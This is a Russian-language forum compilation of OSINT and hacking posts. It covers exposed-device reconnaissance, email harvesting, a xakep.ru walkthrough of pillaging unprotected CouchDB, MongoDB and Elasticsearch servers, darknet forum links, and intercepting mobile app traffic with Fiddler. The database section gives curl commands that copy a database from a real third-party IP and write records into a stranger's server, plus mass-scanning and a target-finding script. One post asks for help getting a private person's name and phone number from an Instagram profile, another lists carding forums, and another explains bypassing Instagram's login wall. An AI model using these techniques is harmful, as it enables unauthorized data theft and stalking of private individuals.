Индустрия здравоохранения является одной из наиболее уязвимых отраслей, и, от
того, требующая повышенной безопасности. Речь идет не только о личной
информации, как в других отраслях,
но и о жизнях людей, которые подвергаются опасности в случае кибератак или
несанкционированного доступа к больничным системам. Многие устройства открыты
для доступа извне, что повышает шансы на их компрометацию.
Существует множество уязвимостей, которые не закрывают годами. Злоумышленники
без труда могут получить доступ через открытый RDP и расширить свои привилегии
для всей сети.
Вот почему так важно проводить тестирования на проникновения в медицинских
клиниках и больницах.
От ТС
Перевод взят [отсюда](https://telegra.ph/Kriticheskaya-infrastruktura---
razvedka-medicinskih-uchrezhdenij-12-30) (Moody, cпециально для каналов
@cybred и @in51d3)
Оригинал на en [тут](https://www.offensiveosint.io/when-amerka-meets-
healthcare-research-on-exposed-medical-devices/)
У меня есть много инетерсных статей от
Wojciech, не переведённых на
русский.
В будующем могу взяться за их перевод.
Разве́дка на осно́ве откры́тых исто́чников
([англ.](https://codeby.net/goto/link-
confirmation?url=aHR0cHM6Ly9ydS53aWtpcGVkaWEub3JnL3dpa2kvJUQwJTkwJUQwJUJEJUQwJUIzJUQwJUJCJUQwJUI4JUQwJUI5JUQxJTgxJUQwJUJBJUQwJUI4JUQwJUI5XyVEMSU4RiVEMCVCNyVEMSU4QiVEMCVCQQ%3D%3D)
Open source intelligence, OSINT) — разведывательная дисциплина, включающая в
себя поиск, выбор и сбор разведывательной информации из общедоступных
источников, а также её анализ.
Маленькая но очень информативная шпаргалка для работы с OSINT.
Что внутри книги :
1. Операторы Google,Bing,Yandex,DuckDuckGo,Baidu и т.д
2. Поиск информации о человеке в
Twitter,Facebook,Snapchat,Instagram,TikTok
3. Поиск изображений/видео/документов/локаций
4. Найти детальную информацию о имени человека,Email,никнейме,номера
телефона,домена/ip,организации и т.д
5. Набор инструментов от специалистов
6. Подробная методология OSINT 'а
7. Советы от специалистов по созданию аккаунтов для OSINT'а
8. Горячие клавиши для Windows/Mac, Chrome/Firefox
9. Установка OS Buscandor 2.0
Hidden content for authorized users.
https://dropmefiles.com/ZPuZC , если шпаргалка помогла,не забудь Thumbs up!
Недавно наткнулся на новый и очень неплохой сервис:
![snov.io](/proxy.php?image=https%3A%2F%2Fsnov.io%2Fimages%2Fog%2Findex- new.png&hash=bb72282fd29e96ffb44331f9f36065b3&return_error=1)
Snov.io Black Friday • 50% off! Upgrade your sales process and close more deals with Snov.io sales tools. Ideal for B2B companies, SDRs, and sales teams.
![snov.io](/proxy.php?image=https%3A%2F%2Fsnov.io%2Fimages%2Ffavicon%2Fandroid- icon-192x192.png&hash=7652480a43454824a9215682fd7e78a5&return_error=1) snov.io
который позволяет вытащить список почт с домена (и в принципе этот список
получается гораздо больше, чем дают Infoga, maltego и прочие theharvester)
Собственно сервис представляет из себя Web интерфейс + плагин для хрома.
Регистрация на данный момент бесплатная (и 50 запросов в подарок).
Примеры того, что выдает сервис:
Можем заметить, что нашел он аж 564 человека, которых смог идентифицировать,
1048 почтовых адресов.
Также, часто можно посмотреть историю о конкретном человеке, в том числе
перемещения его между компаниями:
Нужно определить ФИО, номер телефона человека по его реальному профилю в инстаграмме. В профиле есть только 1 фото лица на аве , в подписках и подписчиках есть реальные родственники тк 40+ лет. Я знаю только имя человека, примерный возраст и родной город с населением до 200к. Пробовал искать всех его подписчиков в вк и через их страницы в друзьях найти его но ничего не нашел, скорее всего у него нет вк. Странно что в подписчиках нет одноклассников или одногруппников, просмотрел фото всех подписчиков, не нашел никаких общих фотографий с ним. Есть примерно 5-6 вариантов возможной фамилии. Думаю попробовать найти бд жителей этого города и попробовать перебрать все варианты. Посоветуйте где можно найти бд или человека который сможет найти нужную мне информацию за деньги. Может есть какие то идеи у вас которые помогут мне, спасибо.
Сегодня я постараюсь рассказать и показать, как легко злоумышленники могут получить доступ к обширным массивам всевозможных данных. Прежде чем приступать к атакам, предлагаю разобраться, почему они вообще возможны и почему жизнь по‑прежнему ничему не учит админов и прочих причастных к защите БД.
Таким образом, одной из основных причин утечки данных служит ~~криворукость администраторов~~ небезопасная конфигурация СУБД, оставленная в результате невнимательности или же просто недостатка знаний.
CouchDB — это база данных с открытым исходным кодом, разработанная программным фондом Apache. Классическая NoSQL-база. Написана на языке Erlang.
Больше всего нас интересуют способы подключения:
Доступ к БД реализован по протоколу HTTP с использованием JSON API, что позволяет обращаться к данным в том числе из выполняемых в браузере веб‑приложений. Имеет свой собственный графический веб‑интерфейс (Futon).
Мы же воспользуемся обычным curl. Вот, к примеру, запрос приветствия:
Code:Copy to clipboard
curl http://127.0.0.1:5984/
Ответ расскажет нам о номере версии, имени поставщика и версии программного обеспечения:
Code:Copy to clipboard
{
"couchdb":"Welcome","version":"2.3.1",
"git_sha":"c298091a4",
"uuid":"777dc19849f3ff0392ba09dec1a62fa7",
"features":["pluggable-storage-engines","scheduler"],
"vendor":{"name":"The Apache Software Foundation"}
}
Чтобы получить список всех БД на сервере, можно выполнить такой запрос:
Code:Copy to clipboard
curl http://127.0.0.1:5984/_all_dbs
В ответ мы увидим
Code:Copy to clipboard
[
"_replicator",
"_users",
"mychannel_",
"mychannel_kizuna-chaincode",
"mychannel_lscc",
"mychannel_user"
]
Здесь _replicator и _users — это стандартные БД.
В ответ также можно получить такую ошибку:
Code:Copy to clipboard
{
"error":"unauthorized",
"reason":"You are not a server admin."
}
Смело идем мимо, здесь ловить нечего. Уровень анонимного доступа настроен так, что мы не можем даже увидеть список БД на сервере, не то что к ним подключиться. Но можно попробовать наудачу подобрать пароль. Запрос на авторизацию выглядит следующим образом:
Code:Copy to clipboard
curl -X PUT http://localhost:5984/test -u "login:password"
Чтобы подключиться к графическому интерфейсу, нет необходимости ставить какое‑либо ПО, достаточно просто в браузере перейти по такому адресу:
Code:Copy to clipboard
http://127.0.0.1:5984/_utils/
Чтобы унести данные, можно воспользоваться следующим запросом:
Code:Copy to clipboard
curl -X POST -d '{"source":"http://54.161.77.240:5984/klaspadchannel_","target":"http://localhost:5984/klaspadchannel_"}' http://localhost:5984/_replicate -H "Content-Type: application/json"
Конечно же, потребуется поднять сервер CouchDB на локальной машине. Впрочем, было бы странно, если бы его у тебя не было, раз уж ты собрался работать с этой базой.
MongoDB — это кросс‑платформенная, документоориентированная база данных, которая обеспечивает высокую производительность и легкую масштабируемость. В основе данной БД лежит концепция коллекций и документов. Способов подключения опять два:
Получить минимальную информацию о находке можно простым GET-запросом на порт API.
Code:Copy to clipboard
curl -X GET http://114.116.117.104:27017
Сведения здесь и правда скромные, без драйвера БД не удастся добыть хоть
сколько‑нибудь полезные данные, кроме того, что БД здесь вообще присутствует
(или нет).
Если на порте крутится действительно MongoDB, то ответ придет таким:
Code:Copy to clipboard
It looks like you are trying to access MongoDB over HTTP on the native driver port.
Этого вполне достаточно, чтобы продолжить ручную проверку при помощи
графического клиента.
Унести данные из находки можно через GUI.
Elasticsearch — это представитель кластерных NoSQL баз данных, имеющий JSON REST API и использующий Lucene для полнотекстового поиска. Написана на Java. Мы будем рассматривать его как хранилище документов в формате JSON.
База Elasticsearch способна масштабироваться до петабайт структурированных и неструктурированных данных. Данные в индексе разделены на один или несколько осколков (шардов). Благодаря разделению Elasticsearch может масштабироваться и достигать размеров, которые не потянула бы одна машина. Elasticsearch — это распределенная система, описать максимальные объемы хранения данных затруднительно, могу сказать только, что там могут лежать петабайты и больше.
Способы подключения следующие:
HTTP API — штука очень простая. Для начала давай запросим приветствие. Ради безопасности подопытного сервера часть адреса замазана:
Code:Copy to clipboard
curl -XGET http://47.99.Х.Х:9200/
Если все хорошо и мы правда нашли «Эластик», то в ответ придет что‑то подобное:
Code:Copy to clipboard
{
"name" : "node-2",
"cluster_name" : "es",
"cluster_uuid" : "q10ZJxLIQf-ZRZIC0kDkGQ",
"version" : {
"number" : "5.5.1",
"build_hash" : "19c13d0",
"build_date" : "2017-07-18T20:44:24.823Z",
"build_snapshot" : false,
"lucene_version" : "6.6.0"
},
"tagline" : "You Know, for Search"
}
Выведем список всех индексов в БД:
Code:Copy to clipboard
curl -XGET http://47.99.Х.Х:9200/_cat/indices?v
Ответ получим примерно такой.
Code:Copy to clipboard
health status index uuid pri rep docs.count docs.deleted store.size pri.store.size
green open bdp-interface x3DLdQRyTK2jssMvIJ3FmA 5 1 32576 28 428.9mb 214.4mb
green open onair-vlog Vsq0srUGSk2NvvYmXpxMBw 5 1 22 0 931.9kb 465.9kb
green open meizidb PCybF4SvTdSt1BoOCYLxNw 5 1 5328 1 27.9mb 13.9mb
green open rms-resource R6c3U5_pQgG71huRD0OdDA 5 1 125827 36 1.2gb 636.2mb
Узнаем названия полей, которые хранятся в БД:
Code:Copy to clipboard
curl -XGET http://47.99.X.X:9200/meizidb
Ответ:
Code:Copy to clipboard
{
"meizidb":{
"aliases":{},
"mappings":{
"assets":{
"dynamic_templates":[{"string":{
"match_mapping_type":"string",
"mapping":{"type":"keyword"}
}}],
"properties":{
"annexList":{
"properties":{
"annexFileId":{"type":"keyword"},
"annexName":{"type":"keyword"},
"annexSize":{"type":"long"},
"annexThumbUrl":{"type":"keyword"},
"annexType":{"type":"keyword"},
"annexUrl":{"type":"keyword"}
}
},
"appCode":{"type":"keyword"},
"asrText":{"type":"text","index_options":"offsets","analyzer":"ik_max_word"},
"assetsType":{"type":"keyword"},
"cdetail":{
"properties":{
"SP":{"type":"keyword"},
"jz":{"type":"keyword"},
"src":{"type":"keyword"},
"tag":{"type":"keyword"},
"type":{"type":"keyword"}
}
},
"companyId":{"type":"keyword"},
"companyName": ...
}
Можно и вносить записи. Но я настоятельно не рекомендую, так как без договора с владельцем сервера это может повлечь тяжкие последствия.
Code:Copy to clipboard
curl -X POST http://47.99.Х.Х:9200/onair-vlog/catalogue/1 -H 'Content-Type: application/json' -d @- << EOF
{
"username" : "KassNT",
"subject" : "My Referal url: ",
"referal" : "https://xakep.ru/paywall/form/?init&code=xakep-promo-KassNT"
}
EOF
Существуют два пути поиска подопытных.
Первый путь — онлайновые сервисы, которые сканируют весь мир и предоставляют нам информацию о хостах при помощи поисковых операторов. Можно, например, «просто найти» цель в одном из них.
Показывать каждый подробно я не буду, но приведу несколько примеров. Например, запрос на поиск MongoDB для сервиса Fofa будет выглядеть так.
![Fofa.so](/proxy.php?image=https%3A%2F%2Fst768.s3.eu-
central-1.amazonaws.com%2F9d80c10a38f02f7be1eadc8e354c7e09%2F16775%2Ffofasearch.jpg&hash=12b83d8bf7b70744b98b4023d6ee1e14)
Fofa.so
Подобный ему сервис — Zoomeye.org. Запрос на поиск хостов с поднятой CouchDB
здесь будет выглядеть также несложно.
![ZoomEye](/proxy.php?image=https%3A%2F%2Fst768.s3.eu-
central-1.amazonaws.com%2F9d80c10a38f02f7be1eadc8e354c7e09%2F16786%2Fzoom.jpg&hash=263f19e9b9fc0877c42c6b412cb45f04)
ZoomEye
Продемонстрирую результаты работы сервиса Shodan с помощью одноименной
консольной утилиты. Результат поиска по запросу [product:mongodb
all:"metrics"] будет как на скрине ниже.
![Shodan](/proxy.php?image=https%3A%2F%2Fst768.s3.eu-
central-1.amazonaws.com%2F9d80c10a38f02f7be1eadc8e354c7e09%2F16784%2Fshod.jpg&hash=51deca44071bcfea360bfa508aedd0b2)
Shodan
Второй путь — применить ручные сканеры.
Сканирование, конечно, ручное, но почему бы не воспользоваться готовым набором данных? Например, если VPS-провайдер не позволяет сканировать все подряд на огромной скорости, то эти ребята уже сделали все за вас! Ну, почти.
О Project Sonar слышало не так много людей. Это исследовательский проект, который сканирует сервисы и протоколы, чтобы получить представление о глобальном воздействии распространенных уязвимостей. Разработан в компании, создавшей, надеюсь, небезызвестный тебе Metasploit Framework, — Rapid7. Собранные данные доступны широкой публике для исследований в области безопасности.
![Project Sonar](/proxy.php?image=https%3A%2F%2Fst768.s3.eu-
central-1.amazonaws.com%2F9d80c10a38f02f7be1eadc8e354c7e09%2F16785%2Fsonar.jpg&hash=e4af9588d1e1c3e8f4b956a4247a63c7)
Project Sonar
Нам будет интересен раздел TCP Scans, где содержатся результаты опроса IP-адресов по различным портам. Подойдет, например, набор данных по результатам 9200 порта (Elasticsearch).
Code:Copy to clipboard
TCP Scans
[2020-10-07-1602049416-http_get_9200.csv.gz] [39.9 MB] [October 7, 2020]
Lines: 3 472 740
[ 'timestamp_ts' , 'saddr' , 'sport' , 'daddr' , 'dport' , 'ipid' , 'ttl' ]
'1602049426' , '146.148.230.26' , '9200' , '71.6.233.15' , '9200' , '54321' , '248'
'1602049426' , '34.102.229.177' , '9200' , '71.6.233.70' , '9200' , '60681' , '122'
'1602049426' , '104.232.64.108' , '9200' , '71.6.233.105' , '9200' , '54321' , '248'
'1602049426' , '164.116.204.58' , '9200' , '71.6.233.79' , '9200' , '38329' , '242'
'1602049426' , '35.186.233.76' , '9200' , '71.6.233.7' , '9200' , '44536' , '122'
'1602049426' , '192.43.242.72' , '9200' , '71.6.233.113' , '9200' , '19234' , '56'
'1602049426' , '166.241.202.174' , '9200' , '71.6.233.47' , '9200' , '26802' , '242'
'1602049426' , '142.92.75.134' , '9200' , '71.6.233.115' , '9200' , '28081' , '243'
'1602049426' , '198.86.33.87' , '9200' , '71.6.233.112' , '9200' , '17403' , '59'
Для Masscan составим такую команду на запуск:
Code:Copy to clipboard
masscan -p9200,9042,5984,27017 10.0.0.0/8 --echo > result.txt
![Masscan](/proxy.php?image=https%3A%2F%2Fst768.s3.eu-
central-1.amazonaws.com%2F9d80c10a38f02f7be1eadc8e354c7e09%2F16781%2Fmss.jpg&hash=4d0d0b1100704d4f93f83d1dbdca869d)
Masscan
Имея на руках готовый список хостов, можно приступить к детальной проверке.
![Nmap](/proxy.php?image=https%3A%2F%2Fst768.s3.eu-
central-1.amazonaws.com%2F9d80c10a38f02f7be1eadc8e354c7e09%2F16782%2Fnmap.jpg&hash=7137ce4bcc85f2859d5104acc2ec0894)
Nmap
Здесь видно, что порт не просто открыт — на нем запущен сервис Elasticsearch.
В результате сканирования и поиска разными сервисами было обнаружено немало
любопытного. На скринах — небольшая выборка.
![CouchDB](/proxy.php?image=https%3A%2F%2Fst768.s3.eu-
central-1.amazonaws.com%2F9d80c10a38f02f7be1eadc8e354c7e09%2F16772%2Fcp.jpg&hash=3cb6a6b950b80faf0d042738f4c72e09)
CouchDB
![InfoRisk](/proxy.php?image=https%3A%2F%2Fst768.s3.eu-
central-1.amazonaws.com%2F9d80c10a38f02f7be1eadc8e354c7e09%2F16776%2Fir.jpg&hash=c1b069b56aec920d532614aed4e43626)
InfoRisk
![Чаты](/proxy.php?image=https%3A%2F%2Fst768.s3.eu-
central-1.amazonaws.com%2F9d80c10a38f02f7be1eadc8e354c7e09%2F16770%2Fchpd.jpg&hash=27f0516c799d0acaafe768f6505ade1a)
Чаты
Неожиданно обнаружились списки имен, ников, фамилий (со ссылкой на конкретный
аккаунт Telegram, VK или Viber), 16 баз данных, в каждой 15–20 тысяч строк
таких вот списков.
![Apache Cassandra](/proxy.php?image=https%3A%2F%2Fst768.s3.eu-
central-1.amazonaws.com%2F9d80c10a38f02f7be1eadc8e354c7e09%2F16773%2Fdatastax.jpg&hash=c4f5f43bd8dae56d0b5a493b187dfc50)
Apache Cassandra
Вот что в последнее время случается с теми, кто криво настраивает доступ к БД. Все данные отправляются на тот свет, а незадачливому админу остается только записка с требованием выкупа.
![Требование выкупа](/proxy.php?image=https%3A%2F%2Fst768.s3.eu-
central-1.amazonaws.com%2F9d80c10a38f02f7be1eadc8e354c7e09%2F16780%2Fmongr.jpg&hash=a9a0278f4928315a2a068d5e9db14b82)
Требование выкупа
Можно глянуть, кто и что творил с данными, при помощи команды show log.
![Убитая БД](/proxy.php?image=https%3A%2F%2Fst768.s3.eu-
central-1.amazonaws.com%2F9d80c10a38f02f7be1eadc8e354c7e09%2F16779%2Fmongoshel1.jpg&hash=a6532b6946a4f83a77941aaf1651bad2)
Убитая БД
Как видно, все довольно просто: зашли, стерли данные, повесили свой README. Прочитав логи, легко можно увидеть, что «записка о выкупе» перезаписывалась много раз. Каждый раз, когда очередной злодейский бот находит открытую базу, записка просто меняется на новую.
![Убитая БД](/proxy.php?image=https%3A%2F%2Fst768.s3.eu-
central-1.amazonaws.com%2F9d80c10a38f02f7be1eadc8e354c7e09%2F16777%2Fmngsh.jpg&hash=f2a68da7c8be60fe7b0b0e37113a822a)
Убитая БД
Бот проверяет возможность авторизации и записи, после чего дропает все данные, оставляя памятку скорбящему владельцу. Данные, конечно, никто не возвращает и даже не бэкапит перед уничтожением, как красиво расписано в тексте. Здесь надеяться на честность преступника, к сожалению, бесполезно.
Чтобы быстрее искать СУБД, я написал небольшой скрипт, который работает со списками в формате [ip]:[port]. Вот что он делает:
Действия совершаются циклически, пока не закончится входной файл.
Code:Copy to clipboard
echo "$LINE" | cut -d":" -f'1 2';
HTTP_CODE=$(curl --write-out "%{http_code}n" "http://"$LINE"" --output output.txt --silent --connect-timeout 4)
if (("$HTTP_CODE"=="200")); then
echo "##########################--HTTP_API_FOUND--#########################";
echo $LINE >> result.txt
else
echo "Tried to access it, but f'ed up";
echo $LINE >> trash_bin.txt
fi
Поскольку распространение таких скриптов может квалифицироваться как создание
вредоносных программ, я привожу не совсем рабочий код. И тебе тоже рекомендую
быть бдительным, если попробуешь написать что‑то в том же духе.
![Пример работы скрипта](/proxy.php?image=https%3A%2F%2Fst768.s3.eu-
central-1.amazonaws.com%2F9d80c10a38f02f7be1eadc8e354c7e09%2F16783%2Fscr.jpg&hash=0adc48015d896b66c2172a4d2a2d9150)
Пример работы скрипта
Как видишь, автоматизировать поиск целей и даже их дальнейшую «обработку» крайне легко.
Я, конечно, рассмотрел далеко не все варианты, выбрав наиболее часто «текущие» СУБД. Но принцип, думаю, понятен: даже если ты админ, а не какой‑нибудь хакер, знать возможные векторы атак обязательно. Периодически сканируй свои серверы и будешь узнавать о дырах раньше, чем их найдут злоумышленники. Закрывай по умолчанию все ненужные порты. Прячь эндпоинты за авторизацией и генерируй надежные пароли. И, конечно, делай бекапы на случай, если твои данные все же найдет и уничтожит чей‑то бот.
Автор @kassnt / Михаил Артюхин
взято с хакер.ру
![github.com](/proxy.php?image=https%3A%2F%2Frepository- images.githubusercontent.com%2F275031765%2F68237c00-491c-11eb-86b6-05150f13a326&hash=5492df5aa1a81bd462b69c157da327b9&return_error=1)
used on different sites like twitter, instagram and will retrieve information on sites with the forgotten password function. ](https://github.com/megadose/holehe)
holehe allows you to check if the mail is used on different sites like twitter, instagram and will retrieve information on sites with the forgotten password function. - megadose/holehe
github.com
Инструмент проверяет на каких сайтах зарегистрирован email. Часто добавляются новые сайты.
Есть какие нибудь варианты?
http://zqktlwiuavvvqqt4ybvgvi7tyo4hjl5xgfuvpdf6otjiycgwqbym2qad.onion/wiki/index.php/Main_Page
WIKIpages
http://b34xhb2kjf3nbuyk.onion/ Stock insiders
[URL unfurl = "true"] http://cryptbb2gezhohku.onion [/ URL]
http://www.crdclub4wraumez4.onion
http://thehub7xbw4dc5r2.onion/
[URL unfurl = "true"] http://galaxyaonv32reim.onion/ [/ URL]
[URL unfurl = "true"] http://galaxy3m2mn5iqtn.onion/ [/ URL]
[URL unfurl = "true"] http://cavetord6bosm3sl.onion [/ URL]
[URL unfurl = "true"] http://omertavzkmsn6tp6.onion [/ URL]
[URL unfurl = "true"] http://suprbayoubiexnmp.onion [/ URL]
[URL unfurl = "true"] http://crdclub4wraumez4.onion [/ URL]
http://dkzerogt6z6ybhcj.onion/ Rocksolid Security forum
[URL unfurl = "true"] http://onionlandbakyt3j.onion/ [/ URL]
http://thehub5himseelprs44xzgfrb4obgujkqwy5tzbsh5yttebqhaau23yd.onion/index.php
http://answerstedhctbek.onion/
http://answers6kixxlgc2.onion/
[URL unfurl = "true"] http://e4unrusy7se5evw5.onion/f/index.php? [/ URL]
[URL unfurl = "true"] http://vrmfaneizwqouf5k.onion/wisdom/ [/ URL]
[URL unfurl = "true"]
http://answerszuvs3gg2l64e6hmnryudl5zgrmwm3vh65hzszdghblddvfiqd.onion/ [/
URL]
[URL unfurl = "true"] http://nz544wppkixoqajp.onion/ [/ URL]
http: //torigonsn3d63cldhr76mkfdzo3tndnl2tftiek55i2vilscufer6ryd.onion
Множество советов и приемов для сбора информации из открытых источников подразумевают исследование веб-страниц, в частности, просмотр их "сырого" содержимого. Вспомните идентификатор пользователя в Facebook или URL изображения, на которое вы не можете нажать. Иметь опыт верстки на HTML, при этом, не обязательно, однако, каждый сетевой разведчик должен уметь просматривать исходный код страниц и искать на них ключевые строки, - это один из ключевых навыков в данной области.
На самом деле, это довольно просто: на компьютерах с Windows, во всех основных браузерах, достаточно нажать сочетание Ctrl+Shift+U, чтобы открыть новую вкладку с необработанным HTML-кодом, а в Mac OS - Cmd+Option+U или Cmd+U для Firefox). Также можно воспользоваться контекстным меню (ПКМ на свободной области).
Иногда просмотра исходного кода бывает недостаточно, для таких случаев в
браузерах есть инструменты, предназначенные для отладки веб-страниц, которые
мы также можем использовать. Например, чтобы обойти защиту в Instagram (когда
появляется модальное окно авторизации на всю страницу и отключается прокрутка)
при просмотре чужого профиля неавторизировавшись, откройте инструменты
разработчика при помощи F12 или горячих клавиш Ctrl+Shift+I, наведите мышь на
модальное окно, удалите его кнопкой Delete и уберите свойство с Body
"overflow: hidden
", чтобы вернулась возможность прокрутки.
Я не могу здесь описать подробно каждый инструмент разработчика. Не потому,
что мне лень, а потому, что я не донца знаю, как использовать их все
эффективно. Есть несколько хороших руководств, которые научат вас этому, при
этом, скорее всего, вы будете использовать лишь пару описанных в этих статьях
трюков (как и я), однако всегда интересно посмотреть, как работает магия
осинта на разных страницах. Вы можете начать с OSINT Curious и их краткого
экскурса в инструменты
разработчика. Затем пойти дальше
и перейти к ускоренному курсу по Google Chrome Developer
Tools, ну а потом переключиться
на Джастина Зейтца и ознакомиться с его видео о расширенном анализа веб-
сайтов для OSINT.
Интересно, что вы также можете использовать инструменты разработчика в Chrome
для отладки «удаленного» браузера на устройствах, работающих под Android. Все,
что вам нужно, это USB-кабель, установленные драйверы Android Debug Bridge
(adb) на вашей рабочей машине и Google Chrome на обоих устройствах. Как это
все правильно настроить можно найти в [официальной
документации](https://developers.google.com/web/tools/chrome-devtools/remote-
debugging) от Google. Я все еще не уверен, как бы я использовал эту функцию в
моей работе и OSINT исследованиях, хотя ...
Инструменты разработчика также дают вам возможность эмулировать мобильное
устройство и визуализировать веб-сайт в точности, будто он открыт в нем. Эта
функция называется «Режим адаптивного дизайна».
«Время стать мобильным»
Люди все меньше времени проводят за работой на ноутбуке и у настольного ПК, и
все чаще сидят за мобильными устройствами. Особенно много времени они тратят в
приложениях (посмотрите статистику «US Time Spent with Mobile
2019»). Мы
еще не пережили смерть компьютерного браузера, и, даже если у многих
существующих мобильных приложений существует обычный веб-интерфейс, он не
является панацеей, на которой мы можем остановиться. Как правило, приложения
хранят в себе множество тайн, которые невозможно найти в их браузерных
альтернативах. Стоит также отметить, что некоторые разработчики вообще не
создают веб-интерфейс. Это особенно актуально для приложений социальных сетей,
таких как Snapchat или TikTok. Приложения, которые чрезвычайно популярны и
поэтому чрезвычайно интересны для OSINT-исследователей.
Итак, что мы можем сделать, когда нужно исследовать приложение, которое доступно только на смартфоне (или на ПК, но в виде отдельного клиента)?
Во-первых, загуглить! Сообщество OSINT/Infosec обычно делится обширными знаниями, и если кто-то уже пытался «хакнуть» искомое приложение, вероятно, вы сможете обнаружить новости об этом. Не забудьте проверить анонсы разработчиков. Проверьте, сделали ли они какие - нибудь функции доступными через браузеры, проверьте API, а также бета-версии. Вы также можете прошерстить сабреддиты или темы на форумах.
Ничего не нашли? Да начнется веселье!
Большинство мобильных приложений используют протокол HTTP(S), чтобы общаться с
серверами. TikTok использует HTTP, Snapchat использует HTTPS, Tinder
использует смесь HTTPS и HTTP. Вы поняли мою мысль.
HTTP - это протокол, с которым достаточно просто работать, при этом, используя прокси. Прокси-сервер - «это промежуточный сервер в компьютерных сетях, выполняющий роль посредника между пользователем и целевым сервером. Когда компьютер отправляет запросы на сайты и службы в Интернете, прокси-сервер перехватывает эти запросы и затем связывается с веб-серверами, как посредник» (источник: https://www.cloudflare.com/learning/cdn/glossary/reverse- proxy/)
На компьютере можно использовать множество прокси-серверов: WinGate или FreeProxy в Windows, SquidMan в MacOS. Но есть и другое решение, которое объединяет мощь прокси-сервера и инструментов разработчика: Fiddler, «бесплатный прокси-сервер для отладки веб-страниц для любого браузера, системы или платформы», созданный в 2003 году Эриком Лоуренсом.
Fiddler
Перво-наперво: установите Fiddler на компьютер, который вы хотите использовать
при анализе. Затем возьмите смартфон или запустите виртуальную машину, которую
вы будете использовать для манипуляций с приложениями. Обе системы должны быть
в одной сети.
Моя настройка проста: я использую смартфон на Android с 4G-подключением, параллельно синхронизируя его с ноутбуком, на котором установлен Fiddler, через WiFi.
Следующий шаг - найти IP-адрес компьютера, который будет служить прокси-
сервером. Для этого, в командной строке Windows введите ipconfig
. В
терминале MacOS / Linux: ifconfig
. Затем, запишите или сфотографируйте его.
После этого запустите Fiddler, перейдите в «Инструменты», «Параметры…» и остановитесь на вкладке «Подключения». Установите флажок «Разрешить подключение удаленным компьютерам». Обратите внимание, что после сохранения настроек, Fiddler будет прослушивать порт 8888.
Далее мы должны настроить свой телефон / виртуальную машину для использования
прокси. На моем старом Samsung я открываю настройки, нажимаю «Wi-Fi»,
удерживаю соединение, которое используется в данный момент и выбираю «Изменить
настройки сети», после этого ставлю галочку «Показать дополнительные
параметры», перехожу чуть ниже и выбираю «Вручную» в разделе «Прокси». Здесь я
вписываю IP-адрес, найденный ранее, на компьютере. И указываю порт 8888.
Остался последний шаг. Его необходимо выполнить, чтобы можно было работать с HTTPS трафиком. Вернитесь к Fiddler и посмотрите в левый нижний угол - черное поле ввода с зеленым текстом. Это поле «QuickExec». Введите в этом поле следующую команду и нажмите «Enter».
Code:Copy to clipboard
about:config
На правой панели появится список переменных. Добавьте в этот список:
Code:Copy to clipboard
fiddler.certmaker.ValidDays
и присвойте значение 820. Это изменит дату истечения срока действия сертификата, который мы установим далее. Мы делаем это, чтобы в дальнейшем избежать ошибок на Android.
Теперь давайте установим сертификат на смартфон. Запустите на нем браузер и
откройте http://ipv4.fiddler:8888.
Загрузите и установите сертификат FiddlerRoot. Настройка окончена, теперь весь
HTTP (S) трафик с вашего телефона будет проходить через Fiddler.
Проверьте настройки, посерфив какие-нибудь веб-сайты на телефоне.
Теперь, когда прокси работает, давайте настроим Fiddler, чтобы скрыть тот трафик, который мы не хотим видеть. Перейдите на вкладку «Фильтры» и в раскрывающемся списке «Нет фильтра хоста» выберите «Скрыть следующие хосты». Введите IP-адрес прокси, установите флажок «Использовать фильтры» и в «Действиях» выберите «Запустить набор фильтров сейчас».
Опять же, я не являюсь веб-разработчиком или тестировщиком приложений, поэтому
идея в том, чтобы упростить действия, как будто это низкоуровневый реверс.
Очистите сессии, которые Fiddler собрал, нажав «X» в строке меню.
Запустите приложение, которое вы хотите исследовать. Давайте начнем с TikTok в качестве примера. При запуске приложения отображается несколько подключений к api2–16-h2.musical.ly и другим поддоменам в домене music.ly. Выберите вкладку «Инспекторы» и перейдите в «TextView». Когда вы выбираете сеанс, Fiddler декодирует и показывает его как текстовый объект.
Советую начинать с любого известного вам профиля: любая учетная запись, о которой вы знаете какую-либо информацию, которая может быть скрыта. К примеру, давайте поищем аккаунт «Лорен Грей» или «самый успешный аккаунт за пределами Китая». При любой активности, Fiddler будет заполняться "звонками" с разных URL-адресов.
Так как запросов множество, из этого множества нам нужно найти только те, которые будут относиться к искомой учетной записи. Один из простых способов сделать это - переключиться на «ImageView» и перемещаться вверх и вниз до тех пор, пока не найдете нужные изображения, относящиеся к актуальной информации.
Мне потребовалось просмотреть 6 запросов, чтобы найти "тот самый". Информация
поступила с поддомена api2–16-h2.musical.ly, - это краткая сводка о «Лорен
Грей». Уже неплохо, а еще лучше то, что она отформатирована в формате JSON (вы
также можете переключиться на вкладку «JSON» для более удобного просмотра) и
содержит интересные поля, такие как:
Code:Copy to clipboard
user
uid=934514
unique_id=lorengray
avatar_larger
url_list
http://p16.muscdn.com/img/musically-maliva-obj/1660343861335046~c5_1080x1080.jpeg
video_icon
url_list
http://p16.muscdn.com/img/musically-maliva-obj/1660344574058502~tpl-1_q65.webp
youtube_channel_id=UCRYe4G08okte96rmocFNU1g
youtube_channel_title=Loren Gray
Как можно заметить, мы получили ссылку на YouTube-канал, URL аватарки в высоком разрешении и URL-адрес видео. Некоторые из этих элементов не были доступны при просмотре страницы профиля в приложении, да и в веб-интерфейсе (да, у TikTok есть веб-интерфейс!). И этот JSON дает нам данные, не доступные обычному пользователю.
Следующий запрос в списке - это еще один JSON-ответ, но на этот раз, гораздо
больше. Он содержит поле aweme_list с описанием каждого видео.
Теперь вы знаете, что приложение TikTok отправляет запросы к
api2–16-h2.musical.ly для получения ответов в формате JSON. Вы знаете, что за
имя пользователя отвечает параметр unique_id
и что изображения хранятся по
адресу http://p16.muscdn.com/img
в формате jpeg od webp.
Вечеринка окончена
Теперь давайте посмотрим на то, как работает Snapchat.
Сначала я выйду из TikTok, дождусь, пока запросы к его серверам TikTok прекратятся, и очищу сеансы, нажав «X» и выбрав «Удалить все». Когда все будет готово, можно запускать Snapchat.
Snapchat делает много запросов к * .snapchat.com
HTTP (S) серверам. Я буду
действовать точно также, как и раньше, и перейду к панели поиска. На этот раз
я постараюсь найти «Короля Snapchat», DJ Khaled. Но у меня не получится это
сделать. Приложение пытается подключиться к http://aws.api.snapchat.com:443
,
но не получает ответа. Что-то мешает ему получить доступ к серверам: Fiddler.
Snapchat и многие другие приложения используют систему для защиты пользователя от перехвата и дешифрования «посредником», [certificate pinning](https://dzone.com/refcardz/securing-mobile-applications-with-cert- pinning?chapter=2).
